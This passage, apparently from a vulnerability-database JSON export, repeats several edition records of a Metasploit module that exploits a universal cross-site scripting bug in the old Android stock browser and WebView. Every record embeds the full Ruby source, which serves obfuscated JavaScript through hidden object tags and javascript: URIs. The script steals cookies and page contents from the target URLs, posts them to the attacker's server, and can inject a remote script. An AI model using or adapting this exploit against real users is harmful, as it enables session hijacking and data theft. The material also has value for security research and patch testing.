4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T21:02:33", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T21:02:33", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T23:02:35", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T23:02:35", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T00:59:04", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T00:59:04", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T02:57:51", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T02:57:51", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T21:21:31", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T21:21:31", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T23:22:50", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = 